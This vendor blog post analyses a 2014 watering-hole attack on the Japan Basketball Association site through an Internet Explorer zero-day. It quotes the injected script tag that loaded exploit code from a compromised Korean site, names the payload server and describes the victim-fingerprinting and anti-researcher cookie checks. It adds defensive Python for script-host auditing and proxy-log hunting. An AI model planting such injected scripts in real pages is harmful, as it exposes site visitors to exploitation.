Back in March, Symantec blogged about a possible watering hole campaign exploiting a zero-day vulnerability for Internet Explorer 8, the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324). We continued our investigation into this attack, which we dubbed Operation Backdoor Cut, and have concluded that the focus of the attack was to target users associated with the Japanese basketball community. We drew this conclusion from our extended observation of the watering hole campaign abusing the vulnerability being solely hosted on the landing page of the official Japan Basketball Association (JBA) website. No other attacks on any other websites have been confirmed from our telemetry since the disclosure of the zero-day attack in March.
Figure 1. JBA landing page
The JBA website was originally compromised in mid-February to host a malicious script in the site’s HTML code that loaded exploit code from an external site in the background. The site appeared to be cleaned up afterwards; however, it was compromised again in late February to host a similar script. Then, yet again, a malicious script was inserted just hours after the release of the patch for CVE-2014-0324 on Microsoft Patch Tuesday back on March 11. On all three occasions, a short script was inserted in the JBA site in order to redirect traffic to another compromised website, located in Seoul, South Korea, that hosted the exploit code. The following is an example of the script used in the attacks:
<script type="text/javascript" src="https://www.[REMOVED].kr/uc/inc_jba.php"></script>
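A site owner can catch this kind of insertion by auditing which hosts a landing page loads scripts from. The following is an added example, not code from the original post; the page URL, host names, and allowlist are constructed placeholders, and only the path /uc/inc_jba.php is taken from the post.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

class ScriptCollector(HTMLParser):
    """Collect the src attribute of every <script> element on a page."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.sources.append(src.strip())

def unexpected_script_hosts(page_url, html, allowed_hosts):
    """Return absolute script URLs whose host is not on the allowlist."""
    collector = ScriptCollector()
    collector.feed(html)
    allowed = {h.lower() for h in allowed_hosts}
    flagged = []
    for src in collector.sources:
        # urljoin resolves relative paths and protocol-relative //host forms
        absolute = urljoin(page_url, src)
        host = (urlsplit(absolute).hostname or "").lower()
        if host not in allowed:
            flagged.append(absolute)
    return flagged

# Constructed sample: two expected scripts plus one inserted off-site script.
PAGE_URL = "https://www.sports-association.example/"
SAMPLE_HTML = """
<html><head>
<script src="/js/menu.js"></script>
<script type="text/javascript" src="//static.sports-association.example/lib.js"></script>
<script type="text/javascript" src="https://www.cafe-chain.example/uc/inc_jba.php"></script>
</head><body></body></html>
"""
ALLOWED = {"www.sports-association.example", "static.sports-association.example"}

if __name__ == "__main__":
    for url in unexpected_script_hosts(PAGE_URL, SAMPLE_HTML, ALLOWED):
        print("unexpected script source:", url)
```

Run on a schedule against the live landing page, a check like this would flag a re-insertion after a cleanup, which is what happened to the JBA site three times.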
The compromised website, associated with a major Korean Café chain, hosted the actual exploit code. In each of the three compromises, the files were stored in different directories on the site. This particular site was most likely chosen to host the main part of the attack due to it being a reputable business which would not be likely to draw suspicion from security products or services monitoring the organization’s network. The following is a list of the files contained in each directory:
- inc_jba.php
- inc_front_us-en.php
- inc_front_ja-jp.php
- inc_front-2007.php
- inc_front-2010.php
- inc-module.jpg
The short script inserted into the JBA website led to the file inc_jba.php. This file contains JavaScript that checks the targeted user’s computer environment, including the operating system (OS) version, which Microsoft Office version is installed, and the language of the OS. The JavaScript also uses a cookie to check whether the browser has ever visited the page before. If the page has been visited before, the browser is not directed to the exploit code as a precaution in case the user is a security researcher. If the environment meets the specified conditions, the browser is redirected to one of four exploit pages. Each of the four variations of the exploit code has been prepared for a different environment:
- Windows XP - English (EN)
- Windows XP - Japanese
- Windows 7 with Office 2007 on an x86 computer
- Windows 7 with Office 2010 on an x86 computer
If the exploit code is executed successfully, it downloads inc_module.jpg from the same directory and renders the file to acquire the URL of the ultimate payload. Although the file extension is .jpg, it is not an image file, but is actually a data file containing encrypted information about the location of the payload. The browser then redirects to another server located in Seoul, which we believe was prepared by the attacker and uses the SSL protocol to encrypt network traffic. The following is the URL of the Seoul-based server:
https://login[dot]imicrosoft[dot]org/feed
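The request sequence described above can be hunted for in web proxy logs. The following added example (not from the original post) correlates three stages per client: an off-site request referred by the watched site, a .jpg from that host whose body does not start with the JPEG signature, and a follow-on request to a further host. The log format, host names, byte values, and time window are constructed assumptions, and seeing body bytes for HTTPS traffic assumes an inspecting proxy.

```python
from collections import defaultdict

WINDOW = 120               # seconds; assumed correlation window
JPEG_MAGIC = "ffd8ff"      # first three bytes of a real JPEG file

# Constructed log from a hypothetical inspecting proxy, one request per line:
# epoch client host path referer_host first_3_body_bytes_hex
SAMPLE_LOG = """\
1000 10.0.0.5 www.sports-association.example / - 3c2144
1001 10.0.0.5 www.cafe-chain.example /uc/inc_jba.php www.sports-association.example 766172
1003 10.0.0.5 www.cafe-chain.example /uc/inc_front-2010.php www.cafe-chain.example 3c6874
1006 10.0.0.5 www.cafe-chain.example /uc/inc-module.jpg www.cafe-chain.example 8a41c7
1007 10.0.0.5 payload-host.example /feed - -
2000 10.0.0.9 www.sports-association.example / - 3c2144
2001 10.0.0.9 cdn.partner.example /widget.js www.sports-association.example 766172
2002 10.0.0.9 cdn.partner.example /banner.jpg www.sports-association.example ffd8ff
2003 10.0.0.9 fonts.partner.example /a.woff - 774f46
"""

def find_chains(log, watched_site):
    """Return (client, staging_host, fake_jpg_path, next_host) for each client
    that, within WINDOW seconds, (1) requests an off-site resource referred by
    the watched site, (2) fetches a .jpg from that host whose body is not a
    JPEG, and (3) then contacts a further, different host."""
    state = defaultdict(dict)            # client -> progress through the chain
    alerts = []
    for line in log.splitlines():
        ts, client, host, path, ref, magic = line.split()
        s = state[client]
        if s and int(ts) - s["start"] > WINDOW:
            s.clear()                    # chain went stale, start over
        if not s:
            if ref == watched_site and host != watched_site:
                s.update(start=int(ts), staging=host, fake_jpg=None)
        elif s["fake_jpg"] is None:
            is_jpg_name = path.lower().endswith((".jpg", ".jpeg"))
            if host == s["staging"] and is_jpg_name and magic != JPEG_MAGIC:
                s["fake_jpg"] = path
        elif host not in (s["staging"], watched_site):
            alerts.append((client, s["staging"], s["fake_jpg"], host))
            s.clear()
    return alerts

if __name__ == "__main__":
    for alert in find_chains(SAMPLE_LOG, "www.sports-association.example"):
        print("possible watering-hole chain:", alert)
```

The second client in the sample loads a genuine JPEG from a partner host and produces no alert, which shows why the check keys on file content rather than on the extension.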
Interestingly, this site was maintained on a virtual private server (VPS) rented from a company located in Beijing that appears to specialize in providing VPS located in the United States and South Korea. It may be safe to assume that the provider was chosen because of the geo-location of the server. The geo-IP location of the server hosting the payload must have been vital to the campaign’s success.
Figure 2. Login screen of the VPS site
Either the attackers had a strategy to close shop quickly and keep their campaign short-lived, or they implemented some sophisticated evasion technique to prevent security researchers from downloading the payload. Either way, we were unable to acquire the payload from this server.
From our observations, we believe the motive of Operation Backdoor Cut was solely to draw traffic from the JBA watering hole site, as no other websites appear to have been affected. The name of the malicious script file (inc_jba.php) and the name of the cookie (JBA20140312v2) used to count the number of accesses to the page both disguise themselves to appear as part of the JBA page. Traffic from the JBA website accounted for all detections observed by Symantec for this exploit.
Targeting the Basketball Community
Some may wonder why the Japanese basketball community is being targeted. The sporting community has important ties with both the nation and its government and basketball is no different. The Japanese basketball community has a rather interesting connection with the Japanese government. The president of the JBA is the current Deputy Prime Minister and Minister of Finance in Japan. He also happens to be the former prime minister. A link such as this may perhaps be the motive for the watering hole attack on the JBA site. The website may have been considered a good entry point or gateway to the Japanese government.
The Olympics may be another motive. As a major sports organization, the JBA has close ties with the Tokyo Organizing Committee of the Olympic and Paralympic Games, which is the organizing body of the Tokyo 2020 Olympics. It’s no secret that Olympic organizations are often targets of cyberespionage. For instance, data retrieved from an investigation in 2011 into an operation named Shady RAT revealed that several Olympic organizations were attacked and computers on their network were compromised; the Japan Olympic Committee (JOC) happened to be one of the victims. Last year, Japan won the bid for Tokyo to host the Olympic Games in 2020 and is now preparing for the event. The nation is well aware of the potential for cyberattacks when it comes to the prestigious event. The Japanese government, in fact, held a cybersecurity drill in March in preparation for the Olympics to be held six years from now. However, the attacks may have already begun and may have started long before this exercise was launched.
Sectors including government, manufacturing, and finance may be common targets; however, any industry could potentially be at risk of a targeted attack. It is important to realize this and protect networks accordingly. Organizations should be prepared and draw up plans in case attackers happen to intrude into the network.
Symantec has the following protection in place to protect against the Microsoft Internet Explorer Memory Corruption Vulnerability (CVE-2014-0324):
AV
IPS